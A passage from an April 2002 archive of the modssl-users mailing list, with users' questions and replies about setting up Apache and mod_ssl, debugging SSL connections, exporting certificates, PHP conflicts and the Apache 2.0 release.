04:36:36 29988] [info] Seeding PRNG with 23177 bytes of > entropy > [08/Apr/2002 04:36:37 29988] [info] Connection: Client IP: 195.130.109.84, > Protocol: TLSv1, Cipher: EDH-RSA-DES-CBC3-SHA (168/168 bits) > [08/Apr/2002 04:36:37 29988] [info] Initial (No.1) HTTPS request received > for child 0 (server asterix.cs.teiath.gr:599) > [08/Apr/2002 04:36:37 29988] [info] Connection to child 0 closed with > standard shutdown (server asterix.cs.teiath.gr:599, client 195.130.109.84) > > that it means to me,if i get it right, that it works > when i trythe same curl https://asterix.cs.teiath.gr:599 > from a different machine > i receive > curl: (7) connect() failed > > have you any idea what might be wrong? > > i apologise for my huge mail and i thank you for your time. > Apostolis > > > PS > > APACHE AND PHP CONFIG > > PHP config > '--enable-exif' '--enable-track-vars' '--with-calendar=shared' > '--enable-safe-mode' '--enable-magic-quotes' '--enable-trans-sid' > '--enable-wddx' '--enable-ftp' > '--with-gd=/usr/local' '--with-zlib' '--enable-gd-native-tt' > '--with-t1lib=/usr/local' '--with-jpeg-dir=/usr' '--with-png-dir=/usr' > '--with-zlib-dir=/usr' '--with-ttf' > '--with-freetype-dir=/usr/local' '--with-imap=/usr/local' > '--with-mhash=/usr/local' '--with-mcrypt=/usr/local' > '--with-unixodbc=/usr/local/unixODBC' > '--with-snmp=/usr/local/snmp' '--with-openssl=/usr' '--with-gettext=/usr' > '--with-mysql=/usr' '--with-pgsql' '--with-ldap' '--with-mm' > '--with-mcal=/usr/local/libmcal' > '--with-db3=/usr' > > APACHE MODULES > mod_php4, mod_gzip, mod_dav, mod_auth_ldap, mod_ssl, mod_setenvif, mod_so, > mod_headers, mod_digest, mod_auth_dbm, mod_auth, mod_access, mod_rewrite, > mod_alias, mod_userdir, mod_speling, mod_actions, mod_imap, mod_asis, > mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, > mod_mime, > mod_log_referer, mod_log_agent, mod_log_config, mod_env, mod_vhost_alias, > mod_mmap_static, http_core > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 10 12:16:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA16721; Wed, 10 Apr 2002 12:15:21 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id MAA16717; Wed, 10 Apr 2002 12:15:16 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id MAA17216 for ; Wed, 10 Apr 2002 12:15:14 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma017213; Wed, 10 Apr 02 12:15:09 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id MAA29480 for ; Wed, 10 Apr 2002 12:15:08 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id MAA02708 for ; Wed, 10 Apr 2002 12:15:06 +0200 (MEST) Message-ID: <3CB410AA.DEF3CDC6@bourse.ch> Date: Wed, 10 Apr 2002 12:15:06 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Problem starting apache with ssl mod_ssl References: <1018263143.3cb176675a872@webmail.teiath.gr> <1018432659.3cb40c9358162@webmail.teiath.gr> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users support@cs.teiath.gr wrote: > > > [08/Apr/2002 04:15:41 29987] [info] Init: Configuring server > > asterix.cs.teiath.gr:599 for SSL protocol This indicates that SSL is starting properly. > > then i try the following > > curl https://asterix.cs.teiath.gr:599 > > and it produces in the ssl_engine_log the following > > > > [08/Apr/2002 04:36:36 29988] [info] Connection to child 0 established > > (server asterix.cs.teiath.gr:599, client 195.130.109.84) > > [08/Apr/2002 04:36:36 29988] [info] Seeding PRNG with 23177 bytes of > > entropy > > [08/Apr/2002 04:36:37 29988] [info] Connection: Client IP: 195.130.109.84, > > Protocol: TLSv1, Cipher: EDH-RSA-DES-CBC3-SHA (168/168 bits) > > [08/Apr/2002 04:36:37 29988] [info] Initial (No.1) HTTPS request received > > for child 0 (server asterix.cs.teiath.gr:599) > > [08/Apr/2002 04:36:37 29988] [info] Connection to child 0 closed with > > standard shutdown (server asterix.cs.teiath.gr:599, client 195.130.109.84) > > > > that it means to me,if i get it right, that it works This confirms the server is OK. You can access it from the same machine... > > when i trythe same curl https://asterix.cs.teiath.gr:599 > > from a different machine > > i receive > > curl: (7) connect() failed > > when now i try through a browser https://asterix.cs.teiath.gr:599 > > nothing is happening > > i receive from netscape "server not response" So you cannot connect across a network.... Questions: - do you get anything in the SSL log when you try to connect from across the network? If not -> packets are not reaching server. - to confirm, try "# snoop port 599" to see if there is any traffic at the network layer. - do other network services work across the network (plain HTTP, telnet etc.)? If not -> network problem. - I notice you want to use port 599. Is there a firewall, bridge or router in between the client and server which might be configured to drop packets on such an unusual port? - is it possible to try SSL on port 443 (which is standard)? Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 10 13:55:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA22160; Wed, 10 Apr 2002 13:54:19 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from eprotea.com.my id NAA22126; Wed, 10 Apr 2002 13:53:26 +0200 (MET DST) Received: from there (zan [192.168.2.127]) by eprotea.com.my (8.9.3/8.9.3) with SMTP id TAA28172 for ; Wed, 10 Apr 2002 19:53:21 +0800 Message-Id: <200204101153.TAA28172@eprotea.com.my> Content-Type: text/plain; charset="iso-8859-15" From: "M.Hanizan" To: modssl-users@modssl.org Subject: how to get back the original certificate from SSL structure ? Date: Wed, 10 Apr 2002 19:57:36 +0800 X-Mailer: KMail [version 1.3.1] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "M.Hanizan" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear all :) Is there anybody know how to convert SSL structure (or what so ever structure inside modssl and openssl source i.e X509 structure, BIO structure) back to its original certificate form. Or at least get the string (char array) format which content the encrypted data of the certificate. So then I can put the string back to a file with certificate format as -----BEGIN CERTIFICATE----- $$$ the encrypted data $$$ -----END CERTIFICATE----- This certificate I had installed it inside mybrowser, so it's not a file anymore! Is there anybody know how to do it? Thank you :) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 10 14:42:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA24428; Wed, 10 Apr 2002 14:41:14 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sage-one.net id OAA24391; Wed, 10 Apr 2002 14:40:44 +0200 (MET DST) Received: from SAGEONE (sageone [192.168.0.5]) by sage-one.net (8.11.6/8.11.6) with SMTP id g3ACefQ41037 for ; Wed, 10 Apr 2002 07:40:41 -0500 (CDT) (envelope-from admin@sage-one.net) Message-Id: <3.0.5.32.20020410074044.01146910@mail.sage-one.net> X-Sender: admin@mail.sage-one.net X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Wed, 10 Apr 2002 07:40:44 -0500 To: modssl-users@modssl.org From: Server Admin Subject: Apache+modssl problem running PHP Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Server Admin X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello: I'm running FBSD 4.5 and about to install apache+mod_ssl-1.3.24+2.8.8. I also use mod_PHP4 (and mod_FP). Just noticed this problem report about a conflict on ssl and php: "Problem Report ports/35434 Apache 1.3.23 + mod_ssl 2.8.7 and PHP 4.1.2 causes sig11" Does anyone know if this has been fixed yet or some solution to make ssl and php get along....??? For more details: http://www.freebsd.org/cgi/query-pr.cgi?pr=35434 Thanks! .... our website: http://www.sage-one.net/ Best regards, Jack L. Stone Server Admin ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 10 15:38:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA27187; Wed, 10 Apr 2002 15:37:10 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from listes.cru.fr id PAA27169; Wed, 10 Apr 2002 15:36:45 +0200 (MET DST) Received: from home.cru.fr (home.cru.fr [195.220.94.79]) by listes.cru.fr (8.11.2/jtpda-5.3.2) with ESMTP id g3ADajk31256 for ; Wed, 10 Apr 2002 15:36:45 +0200 Received: from cru.fr (lustu.cru.fr [195.220.94.78]) by home.cru.fr (8.11.6/jtpda-5.3.1) with ESMTP id g3ADaj610948 for ; Wed, 10 Apr 2002 15:36:45 +0200 Message-ID: <3CB43FED.F6E10F44@cru.fr> Date: Wed, 10 Apr 2002 15:36:45 +0200 From: Aumont Organization: Comite Reseaux des Universites X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.14-5.0 i686) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: function file in SSLRequire Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Aumont X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I try to use the SSLrequire directive using the expr %{SSL_CLIENT_S_DN_Email} in {file("/some/file")} Unfortunately, "file()" function is intended to return a single value, not a comma separated list of value. My need is to control access to a enumerated list of personn. I don't want to change httpd.conf (nor any included file). What's the best method to do this ? -- ----------------------------------------------------------- Serge Aumont Comité Réseaux des Universités Campus Beaulieu 35042 Rennes Cedex ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 10 23:11:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA19098; Wed, 10 Apr 2002 23:10:19 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from irvexch1.rainbow.com id XAA19027; Wed, 10 Apr 2002 23:09:25 +0200 (MET DST) Message-ID: <5606C687D4C7D5119A5800508BF30DB401C04337@mail.rainbow.com> From: Lynn Gazis To: "'modssl-users@modssl.org'" Subject: RE: Apache 2.0.* and SSL Date: Wed, 10 Apr 2002 14:11:44 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Lynn Gazis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users An addendum to the second test (Apache 2.0.35 with SSL, on HP UX 11.0, no attempt to use cryptographic accelerator): I found that I can connect to this Web server with IE or Netscape, but attempting to connect with swamp 1.1.0 (using the -connect parameter and no others) results in the same error message as I got from my own application and from OpenSSL's s_client. Lynn Gazis -----Original Message----- From: Lynn Gazis [mailto:lgazis@rainbow.com] Sent: Tuesday, April 09, 2002 4:15 PM To: 'modssl-users@modssl.org' Subject: RE: Apache 2.0.* and SSL OK, I've tested it, and so far it isn't working for me. Here are my tests: 1) Attempt to configure, on an HP UX 11.0 system, to use SSL with a cryptographic accelerator card: Set up Apache 1.3.23, on this same system, and confirmed that it ran and successfully accessed the CryptoSwift card. configure --enable-ssl --with-ssl=/home/lgazis/openssl-engine-0.9.6c --prefix=/home/lgazis/apache2 --enable-rule=SSL_EXPERIMENTAL Had to create lib directory under openssl-engine-0.9.6c and copy libraries there, since they seemed to be expected there rather than at the top level. First problem: http://httpd.apache.org/docs-2.0/install.html makes no mention of actually installing a certificate, and "make certificate" appears to no longer be the correct thing to do. Worked around this by copying conf/ssl.crt and conf/ssl.key from Apache 1.3.23 installation to Apache 2.0.35 installation. Edited httpd.conf, set ServerName to pamela, User to www, Group to nobody, Listen to my IP address and port. Edited ssl.conf and set Listen to my IP address and port, and added "SSLCryptoDevice cswift". Attempted a "bin/apachectl startssl", and got the error: "Invalid command 'SSLCryptoDevice'...". Evidently something has changed, since Apache 1.3, about how to make the cryptographic accelerators in the OpenSSL engine code work. 2) Test, on HP UX 11.0 system, attempting to use SSL and no cryptographic accelerator. Got rid of the SSLCryptoDevice line, and tested to see whether I could make Apache 2.0 work with SSL with no accelerator. This also failed; the server started, but when I generated traffic, none of my handshakes succeeded, and my error log showed lots of "[error] [client 10.10.37.185] Invalid method in request k". Tried a test with OpenSSL's s_client, instead of my own test program, generating the traffic. Ran s_client with the -connect option, and no others. Got the error: warning, not much extra random data, consider using the -rand option CONNECTED(00000003) 905:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol:s23_clnt.c:460 Attempts to specify with ssl3 or tls1 also failed to connect, though with a different error. 3) Attempted to build Apache 2.0 on Solaris 7: Configured with same options as on the HP system, but my make failed with an undefined symbol sk_new_null. Either this isn't working properly, or I am missing some key information about how I am supposed to be setting this up. I've been building and running various versions of Apache 1.3 on these same systems with no difficulty. Lynn Gazis -----Original Message----- From: Cliff Woolley [mailto:jwoolley@apache.org] Sent: Tuesday, April 09, 2002 8:03 AM To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL On Tue, 9 Apr 2002, Mads Toftum wrote: > I too could add a whole lot of reasons to not migrate if you're doing SSL. > Up to about a week before Apache went GA, there were substantial commits to > SSL code which to me makes it an essentially untested module. While I can't wholly disagree with you, I will point out that the only way we can ever really consider SSL "tried and true" is if the people _from_this_group_ test it extensively and help us find the problems with it. Your participation is vital... really! Thanks all, Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 05:23:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA06246; Thu, 11 Apr 2002 05:22:10 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from b105.cyberec.com id FAA06234; Thu, 11 Apr 2002 05:22:00 +0200 (MET DST) Received: from [202.60.246.82] (helo=demo) by b105.cyberec.com with smtp (Exim 3.22 #1) id 16vV9e-0007JU-00 for modssl-users@modssl.org; Thu, 11 Apr 2002 11:21:46 +0800 Message-ID: <005001c1e107$e6540050$0a01a8c0@demo> From: "Alex Hong" To: References: <200204101153.TAA28172@eprotea.com.my> Subject: Re: how to get back the original certificate from SSL structure ? Date: Thu, 11 Apr 2002 11:20:58 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-15" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Alex Hong" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, May be you can try to edit the "httpd.conf" and add the following line: SSLOptions +ExportCertData Then read the header information "SSL_SERVER_CERT" or "SSL_CLIENT_CERT"? Regards, Alex Hong. -------------------------------------------------- Alex Hong Software Engineer, New Paradigm e-Technology Ltd. Email : cyhong@newparadigmgp.com Website: http://www.newparadigmgp.com -------------------------------------------------- ----- Original Message ----- From: "M.Hanizan" To: Sent: Wednesday, April 10, 2002 7:57 PM Subject: how to get back the original certificate from SSL structure ? > Dear all :) > > Is there anybody know how to convert SSL structure (or what so ever structure > inside modssl and openssl source i.e X509 structure, BIO structure) back to > its original certificate form. Or at least get the string (char array) format > which content the encrypted data of the certificate. > > So then I can put the string back to a file with certificate format as > > -----BEGIN CERTIFICATE----- > $$$ the encrypted data $$$ > -----END CERTIFICATE----- > > This certificate I had installed it inside mybrowser, so it's not a file > anymore! > > Is there anybody know how to do it? > > Thank you :) > > > > > > > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 07:03:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA11005; Thu, 11 Apr 2002 07:02:27 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from rcisd.com id HAA10959; Thu, 11 Apr 2002 07:01:50 +0200 (MET DST) Received: from chuck ([206.128.139.13]) by rcisd.com (8.9.3/8.9.3) with SMTP id TAA10254; Wed, 10 Apr 2002 19:59:58 -0700 Message-ID: <011301c1e104$d436e250$0d8b80ce@chuck> From: "Chuck Goehring" To: "modssl" Subject: modssl for Apache 2.0 Date: Wed, 10 Apr 2002 19:58:59 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0110_01C1E0CA.275F57E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Chuck Goehring" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0110_01C1E0CA.275F57E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I see all the activity on the list about Apache 2.0 and modssl. Where = can I get the necessary "stuff" for Apache 2.0. I don't see it on the = modssl, openssl or Apache web sites. I need to get ssl up on Apache on = Windows 2000. Chuck ------=_NextPart_000_0110_01C1E0CA.275F57E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
 
I see all the activity on the list = about Apache 2.0=20 and modssl.  Where can I get the necessary "stuff" for Apache = 2.0.  I=20 don't see it on the modssl, openssl or Apache web sites.  I need to = get ssl=20 up on Apache on Windows 2000.
 
 
Chuck
------=_NextPart_000_0110_01C1E0CA.275F57E0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 07:08:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA11560; Thu, 11 Apr 2002 07:07:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id HAA11540; Thu, 11 Apr 2002 07:06:38 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3B55Xv25360 for ; Thu, 11 Apr 2002 01:05:33 -0400 Date: Thu, 11 Apr 2002 01:05:33 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl Subject: Re: modssl for Apache 2.0 In-Reply-To: <011301c1e104$d436e250$0d8b80ce@chuck> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wed, 10 Apr 2002, Chuck Goehring wrote: > I see all the activity on the list about Apache 2.0 and modssl. Where > can I get the necessary "stuff" for Apache 2.0. I don't see it on the > modssl, openssl or Apache web sites. I need to get ssl up on Apache on > Windows 2000. mod_ssl now comes bundled with Apache 2.0. Just download the .zip or the .msi from http://www.apache.org/dist/httpd/ and openssl from http://www.openssl.org/ if you don't already have it and that's all you need. --Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 07:13:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA11828; Thu, 11 Apr 2002 07:12:21 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from imo-m09.mx.aol.com id HAA11794; Thu, 11 Apr 2002 07:12:03 +0200 (MET DST) Received: from gjmwalsh@netscape.net by imo-m09.mx.aol.com (mail_out_v32.5.) id m.7.3779134 (16228) for ; Thu, 11 Apr 2002 01:11:40 -0400 (EDT) Received: from netscape.com (mow-m17.webmail.aol.com [64.12.180.133]) by air-in02.mx.aol.com (v84.14) with ESMTP id MAILININ24-0411011139; Thu, 11 Apr 2002 01:11:39 -0500 Date: Thu, 11 Apr 2002 01:07:50 -0400 From: gjmwalsh@netscape.net (George Walsh) To: modssl-users@modssl.org Subject: RE: modssl for Apache 2.0 Message-ID: <64AED485.1FC3648B.009AA07D@netscape.net> X-Mailer: Atlas Mailer 2.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: gjmwalsh@netscape.net (George Walsh) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Chuck: With Apache 2.0, mod_ssl is a part of the 'whole'. The build is a far simpler process, and the server, at least in my experience, is much crisper in terms of response. As for windows, that is NOT my cup of tea. We are a Micro-soft Free zone here, so I cannot comment on the peculiarities you might experience in your environment. I really do not know hy you would want to run a secure server on top of a windows box, but then I admit to a happy ignorance about it, at least :-) George >I see all the activity on the list about Apache 2.0 and modssl. Where can I get the necessary "stuff" for Apache 2.0. I don't see it on the modssl, openssl or Apache web sites. I need to get ssl up on Apache on Windows 2000. > > >Chuck > -- George Walsh, Managing Director, CruiseRoutes Division, DSC Directional Services Corp Courtenay, British Columbia, Canada __________________________________________________________________ Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/ Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 07:25:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA12275; Thu, 11 Apr 2002 07:24:12 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id HAA12263; Thu, 11 Apr 2002 07:23:50 +0200 (MET DST) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id BAA00613 for ; Thu, 11 Apr 2002 01:29:16 -0400 Date: Thu, 11 Apr 2002 01:29:16 -0400 (EDT) From: "R. DuFresne" To: modssl-users@modssl.org Subject: RE: modssl for Apache 2.0 In-Reply-To: <64AED485.1FC3648B.009AA07D@netscape.net> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users When is apache 2.0 coming out of beta and into primetime? Thanks, Ron DuFresne On Thu, 11 Apr 2002, George Walsh wrote: > Chuck: > > With Apache 2.0, mod_ssl is a part of the 'whole'. The build is a far simpler process, and the server, at least in my experience, is much crisper in terms of response. > > As for windows, that is NOT my cup of tea. We are a Micro-soft Free zone here, so I cannot comment on the peculiarities you might experience in your environment. I really do not know hy you would want to run a secure server on top of a windows box, but then I admit to a happy ignorance about it, at least :-) > > George > > >I see all the activity on the list about Apache 2.0 and modssl. Where can I get the necessary "stuff" for Apache 2.0. I don't see it on the modssl, openssl or Apache web sites. I need to get ssl up on Apache on Windows 2000. > > > > > >Chuck > > > > > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 07:27:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA12368; Thu, 11 Apr 2002 07:26:16 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id HAA12339; Thu, 11 Apr 2002 07:25:24 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3B5OKW25369 for ; Thu, 11 Apr 2002 01:24:20 -0400 Date: Thu, 11 Apr 2002 01:24:20 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: RE: modssl for Apache 2.0 In-Reply-To: <64AED485.1FC3648B.009AA07D@netscape.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, 11 Apr 2002, George Walsh wrote: > As for windows, that is NOT my cup of tea. We are a Micro-soft Free zone > here, so I cannot comment on the peculiarities you might experience in > your environment. I really do not know hy you would want to run a secure > server on top of a windows box, but then I admit to a happy ignorance > about it, at least :-) FWIW, in 2.0, the Win32 port of Apache is just as solid and performant as the Unix port. (Of course, it is intended for WinNT, 2k, and XP, not the consumer-level ones (95, 98, and ME)...) --Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 07:33:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA12639; Thu, 11 Apr 2002 07:32:14 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id HAA12594; Thu, 11 Apr 2002 07:31:09 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3B5U4Z25377 for ; Thu, 11 Apr 2002 01:30:04 -0400 Date: Thu, 11 Apr 2002 01:30:04 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: RE: modssl for Apache 2.0 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, 11 Apr 2002, R. DuFresne wrote: > When is apache 2.0 coming out of beta and into primetime? How did you manage to miss the party? :) It went GA last week with the release of 2.0.35. --Cliff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 07:34:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA12664; Thu, 11 Apr 2002 07:33:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ip9.elmar.co.il id HAA12634; Thu, 11 Apr 2002 07:32:10 +0200 (MET DST) Received: from netmask.it (ip9.elmar.co.il [192.168.1.9]) by ip9.elmar.co.il (8.11.6/8.11.6) with ESMTP id g3B5VBq05106 for ; Thu, 11 Apr 2002 08:31:11 +0300 Message-ID: <3CB51F9F.4BE83C39@netmask.it> 